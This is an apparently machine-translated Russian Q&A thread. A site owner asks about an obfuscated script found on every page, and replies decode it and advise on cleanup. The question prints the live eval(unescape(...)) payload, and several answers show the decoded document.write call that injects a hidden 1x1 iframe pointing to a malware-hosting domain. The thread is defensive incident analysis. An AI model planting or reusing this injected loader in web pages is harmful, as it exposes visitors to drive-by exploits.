Этот сайт может распространять вредоносные программы? странный javascript?
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%
70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33%
37%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%
3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>
Мой сайт www.safwanmanpower.com атакуется вредоносным скриптом на каждой странице Я не знаю, что этот скрипт все о Может ли кто-нибудь, как этот скрипт сделать мой сайт вредоносным ??
Надеясь на быстрый и положительный ответ.
Отредактировано
Как sumone может атаковать мой сайт без разрешения на загрузку ??
10 ответов:
Неэскапированный код выглядит примерно так:
document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')
При его оценке на ваш сайт будет добавлен iframe размером 1px на 1px, который указывает на указанный выше адрес.
Ваш сайт был скомпрометирован известной сущностью. Ваша страница теперь обслуживает эксплойты для ваших посетителей и подвергает их риску.
Теперь снимите свой сайт и обратитесь к: http://safeweb.norton.com/report/show?name=sedpoo.com
Threat Report Total threats found: 4 Drive-By Downloads (what's this?) Threats found: 3 Here is a complete list: (for more information about a specific threat, click on the Threat Name below) Threat Name: HTTP Malicious Toolkit Variant Activity 15 Location: http://sedpoo.com/?687328 Threat Name: HTTP Malicious Toolkit Variant Activity 15 Location: http://sedpoo.com/?-560137484 Threat Name: HTTP Malicious Toolkit Variant Activity 15 Location: http://sedpoo.com/?2443640 Viruses (what's this?) Threats found: 1 Here is a complete list: (for more information about a specific threat, click on the Threat Name below) Threat Name: Trojan.Gen Location: http://sedpoo.com/des.jarИ: http://www.google.co.uk/safebrowsing/diagnostic?site=sedpoo.com/
What is the current listing status for sedpoo.com? Site is listed as suspicious - visiting this web site may harm your computer. What happened when Google visited this site? Of the 1887 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-01-18, and the last time suspicious content was found on this site was on 2011-01-18. Malicious software includes 2478 exploit(s), 2135 trojan(s), 1508 scripting exploit(s). This site was hosted on 8 network(s) including AS4766 (Korea Telecom), AS51306 (UAIP), AS5610 (CZECH). Has this site acted as an intermediary resulting in further distribution of malware? Over the past 90 days, sedpoo.com appeared to function as an intermediary for the infection of 962 site(s) including feja-islame.com/, yaris-club.net/, cstbilisi.ge/. Has this site hosted malware? Yes, this site has hosted malicious software over the past 90 days. It infected 2519 domain(s), including yaris-club.net/, feja-islame.com/, bhiee.net/. How did this happen? In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.Я бы не посещал место атаки sedpoo, пока вы не изучите угрозу и не будете готовы иметь дело с потенциальной угрозой. инфекции, которые могут последовать. Запуск виртуальной машины для посещения сайта-это быстрый способ дальнейшего исследования без ущерба для вашей рабочей станции и данных.
Вы должны использовать
smscanner
(Simple Server Malware Scanner), который будет сканировать зараженные файлы , скрипты, запутанные коды javascript, оболочки и т. д. и т.д. Он работает до сих пор на веб-серверах linux
На Хром, что отменяет к
"document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')"
, что хром говорит мне, что это сайт, на котором размещена вредоносная программа.
При удалении пробела он декодируется в:
document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')
Если вы хотите посмотреть, что делает этот код, вставьте экранированный код на этот URL (я сделал это, и он, похоже, пытается перенаправить ваш сайт на другую ссылку): http://www.linkedresources.com/tools/unescaper_v0.2b1.html
Используете ли вы на своем сайте какую-то систему управления контентом (CMS)? Если да, то самое лучшее, что вы можете сделать, это зайти на сайт этой CMS и скачать последнюю версию.
Неэскапированный код:
document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')
Который создает iFrame для http://sedpoo.com/?338375 который, как я предполагаю, будет генерировать всплывающие окна для рекламы и т. д.
Unescaped код, используя инструмент здесь, чтобы получить это
document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')
Который встраивает 1px x 1px(фактически невидимый) iframe в вашу страницу, отсюда его наиболее вероятная атака на ваших посетителей с помощью эксплойтов или просто пытается породить рекламные окна
Я отвечу на прямой вопрос: ввод скрипта на каждую страницу означает, что хакер получил контроль над веб-сервером, возможно, над всей веб-фермой хоста.
Как? Возможно, он украл пароль администратора. Может быть, он работал на хозяина и использовал заднюю дверь, которую он посадил. Вы не можете действительно знать, и если вы принимаете, вы не можете действительно защитить себя, поскольку это ответственность хоста.
Если у вас есть хост, найдите другой и более надежный хост. В противном случае сделайте так, как прокомментировал Cfreak, и измените все пароли на сервере, установить новый и мощный Брандмауэр и т. д...
Edit: в случае, если сервер принадлежит вам (т. е. вы не используете сторонний хост), проверьте журнал событий безопасности и посмотрите, кто вошел в систему во время заражения. Очевидно, запустить полную проверку на вирусы/вредоносные программы.